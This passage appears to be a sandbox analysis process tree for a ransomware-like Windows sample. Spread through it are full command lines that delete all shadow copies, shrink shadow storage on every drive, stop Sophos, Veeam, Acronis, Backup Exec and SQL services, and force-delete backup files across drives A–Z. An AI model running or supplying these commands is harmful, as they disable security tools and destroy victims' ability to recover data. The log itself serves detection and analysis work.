    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
    3⤵
    PID:1532
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
      4⤵
      PID:1448
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
    3⤵
    PID:1388
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
      4⤵
      PID:816
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
    3⤵
    PID:1552
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
      4⤵
      PID:760
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    3⤵
    PID:1716
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
      4⤵
      PID:1608
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
        5⤵
        Interacts with shadow copies
        
        PID:2052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
    3⤵
    PID:1888
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
      4⤵
      PID:2036
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
    3⤵
    PID:544
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
      4⤵
      PID:556
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
    3⤵
    PID:1408
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
      4⤵
      PID:1580
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
    3⤵
    PID:812
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
      4⤵
      PID:1772
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
    3⤵
    PID:1636
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
      4⤵
      PID:1988
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
    3⤵
    PID:1944
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
      4⤵
      PID:1012
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
    3⤵
    PID:1756
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
      4⤵
      PID:1752
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
    3⤵
    PID:1728
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
      4⤵
      PID:532
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:2084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
    3⤵
    PID:1736
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
      4⤵
      PID:868
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
    3⤵
    PID:1824
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
      4⤵
      PID:2248
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
    3⤵
    PID:592
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
      4⤵
      PID:108
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
    3⤵
    PID:992
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
      4⤵
      PID:1912
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2480
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
        6⤵
        
        PID:1340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
    3⤵
    PID:1200
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
      4⤵
      PID:776
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
    3⤵
    PID:1500
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
      4⤵
      PID:2228
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2380
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$VEEAMSQL2008R2"
      4⤵
      PID:2480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
    3⤵
    PID:1476
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
      4⤵
      PID:792
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
    3⤵
    PID:1860
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
      4⤵
      PID:2236
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
    3⤵
    PID:1484
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
      4⤵
      PID:2220
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
    3⤵
    PID:1468
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
      4⤵
      PID:2264
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
    3⤵
    PID:1640
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
      4⤵
      PID:2212
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
    3⤵
    PID:416
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
      4⤵
      PID:2256
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
    3⤵
    PID:1812
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
      4⤵
      PID:1900
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    3⤵
    PID:1356
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
      4⤵
      PID:1460
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
    3⤵
    PID:1784
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
      4⤵
      PID:1056
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"
    3⤵
    PID:1228
  - - C:\Windows\system32\net.exe
      net stop "Acronis VSS Provider"
      4⤵
      PID:1480
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Acronis VSS Provider"
        5⤵
        
        PID:2320
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$TPS"
      4⤵
      PID:2484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"
    3⤵
    PID:2340
  - - C:\Windows\system32\net.exe
      net stop " Enterprise Client Service"
      4⤵
      PID:2388
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop " Enterprise Client Service"
        5⤵
        
        PID:2448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Agent"
    3⤵
    PID:2496
  - - C:\Windows\system32\net.exe
      net stop "Sophos Agent"
      4⤵
      PID:2512
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Agent"
        5⤵
        
        PID:2520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"
    3⤵
    PID:2528
  - - C:\Windows\system32\net.exe
      net stop "Sophos AutoUpdate Service"
      4⤵
      PID:2536
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos AutoUpdate Service"
        5⤵
        
        PID:2544
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"
        6⤵
        
        PID:2508
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"
        5⤵
        
        PID:2384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"
    3⤵
    PID:2560
  - - C:\Windows\system32\net.exe
      net stop "Sophos Clean Service"
      4⤵
      PID:2572
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Clean Service"
        5⤵
        
        PID:2580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"
    3⤵
    PID:2608
  - - C:\Windows\system32\net.exe
      net stop "Sophos Device Control Service"
      4⤵
      PID:2624
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Device Control Service"
        5⤵
        
        PID:2656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"
    3⤵
    PID:2672
  - - C:\Windows\system32\net.exe
      net stop "Sophos File Scanner Service"
      4⤵
      PID:2716
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos File Scanner Service"
        5⤵
        
        PID:2736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"
    3⤵
    PID:2872
  - - C:\Windows\system32\net.exe
      net stop "Sophos Health Service"
      4⤵
      PID:2916
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Health Service"
        5⤵
        
        PID:2992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"
    3⤵
    PID:3000
  - - C:\Windows\system32\net.exe
      net stop "Sophos MCS Agent"
      4⤵
      PID:3020
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos MCS Agent"
        5⤵
        
        PID:3040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"
    3⤵
    PID:3048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"
    3⤵
    PID:2080
  - - C:\Windows\system32\net.exe
      net stop "Sophos Message Router"
      4⤵
      PID:2176
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Message Router"
        5⤵
        
        PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"
    3⤵
    PID:2452
  - - C:\Windows\system32\net.exe
      net stop "Sophos Safestore Service"
      4⤵
      PID:2524
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Safestore Service"
        5⤵
        
        PID:2500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"
    3⤵
    PID:2580
  - - C:\Windows\system32\net.exe
      net stop "Sophos System Protection Service"
      4⤵
      PID:2660
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos System Protection Service"
        5⤵
        
        PID:2628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"
    3⤵
    PID:2740
  - - C:\Windows\system32\net.exe
      net stop "Sophos Web Control Service"
      4⤵
      PID:2720
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Web Control Service"
        5⤵
        
        PID:2996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"
    3⤵
    PID:2872
  - - C:\Windows\system32\net.exe
      net stop "SQLsafe Backup Service"
      4⤵
      PID:3020
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLsafe Backup Service"
        5⤵
        
        PID:3060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"
    3⤵
    PID:2452
  - - C:\Windows\system32\net.exe
      net stop "SQLsafe Filter Service"
      4⤵
      PID:2576
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLsafe Filter Service"
        5⤵
        
        PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"
    3⤵
    PID:2720
  - - C:\Windows\system32\net.exe
      net stop "Symantec System Recovery"
      4⤵
      PID:2740
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Symantec System Recovery"
        5⤵
        
        PID:3056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"
    3⤵
    PID:3020
  - - C:\Windows\system32\net.exe
      net stop "Veeam Backup Catalog Data Service"
      4⤵
      PID:1144
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"
        5⤵
        
        PID:2624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "AcronisAgent"
    3⤵
    PID:2736
  - - C:\Windows\system32\net.exe
      net stop "AcronisAgent"
      4⤵
      PID:2452
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "AcronisAgent"
        5⤵
        
        PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"
    3⤵
    PID:2740
  - - C:\Windows\system32\net.exe
      net stop "AcrSch2Svc"
      4⤵
      PID:1144
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "AcrSch2Svc"
        5⤵
        
        PID:2452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Antivirus"
    3⤵
    PID:2736
  - - C:\Windows\system32\net.exe
      net stop "Antivirus"
      4⤵
      PID:2452
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Antivirus"
        5⤵
        
        PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"
    3⤵
    PID:2740
  - - C:\Windows\system32\net.exe
      net stop "BackupExecAgentAccelerator"
      4⤵
      PID:1144
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecAgentAccelerator"
        5⤵
        
        PID:2452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"
    3⤵
    PID:2736
  - - C:\Windows\system32\net.exe
      net stop "BackupExecAgentBrowser"
      4⤵
      PID:2452
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecAgentBrowser"
        5⤵
        
        PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"
    3⤵
    PID:2740
  - - C:\Windows\system32\net.exe
      net stop "BackupExecDeviceMediaService"
      4⤵
      PID:2452
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecDeviceMediaService"
        5⤵
        
        PID:3076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q Z:\*.bac Z:\*.bak Z:\Backup*.* Z:\backup*.*
    3⤵
    PID:3172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q F:\*.bac F:\*.bak F:\Backup*.* F:\backup*.*
    3⤵
    PID:3180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q P:\*.bac P:\*.bak P:\Backup*.* P:\backup*.*
    3⤵
    PID:3204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q R:\*.bac R:\*.bak R:\Backup*.* R:\backup*.*
    3⤵
    PID:3212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q E:\*.bac E:\*.bak E:\Backup*.* E:\backup*.*
    3⤵
    PID:3232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"
    3⤵
    PID:3220
  - - C:\Windows\system32\net.exe
      net stop "BackupExecJobEngine"
      4⤵
      PID:3264
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecJobEngine"
        5⤵
        
        PID:3300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q J:\*.bac J:\*.bak J:\Backup*.* J:\backup*.*
    3⤵
    PID:3196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q B:\*.bac B:\*.bak B:\Backup*.* B:\backup*.*
    3⤵
    PID:3188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q V:\*.bac V:\*.bak V:\Backup*.* V:\backup*.*
    3⤵
    PID:3240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q W:\*.bac W:\*.bak W:\Backup*.* W:\backup*.*
    3⤵
    PID:3248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q Q:\*.bac Q:\*.bak Q:\Backup*.* Q:\backup*.*
    3⤵
    PID:3256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q A:\*.bac A:\*.bak A:\Backup*.* A:\backup*.*
    3⤵
    PID:3292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q U:\*.bac U:\*.bak U:\Backup*.* U:\backup*.*
    3⤵
    PID:3280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q T:\*.bac T:\*.bak T:\Backup*.* T:\backup*.*
    3⤵
    PID:3272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"
    3⤵
    PID:3312
  - - C:\Windows\system32\net.exe
      net stop "BackupExecManagementService"
      4⤵
      PID:3324
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecManagementService"
        5⤵
        
        PID:3364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q L:\*.bac L:\*.bak L:\Backup*.* L:\backup*.*
    3⤵
    PID:3372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\Backup*.* C:\backup*.*
    3⤵
    PID:3356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q H:\*.bac H:\*.bak H:\Backup*.* H:\backup*.*
    3⤵
    PID:3380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q O:\*.bac O:\*.bak O:\Backup*.* O:\backup*.*
    3⤵
    PID:3400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q N:\*.bac N:\*.bak N:\Backup*.* N:\backup*.*
    3⤵
    PID:3468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q I:\*.bac I:\*.bak I:\Backup*.* I:\backup*.*
    3⤵
    PID:3476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q K:\*.bac K:\*.bak K:\Backup*.* K:\backup*.*
    3⤵
    PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q M:\*.bac M:\*.bak M:\Backup*.* M:\backup*.*
    3⤵
    PID:3452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q X:\*.bac X:\*.bak X:\Backup*.* X:\backup*.*
    3⤵
    PID:3444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q G:\*.bac G:\*.bak G:\Backup*.* G:\backup*.*
    3⤵
    PID:3436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q D:\*.bac D:\*.bak D:\Backup*.* D:\backup*.*
    3⤵
    PID:3424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q S:\*.bac S:\*.bak S:\Backup*.* S:\backup*.*
    3⤵
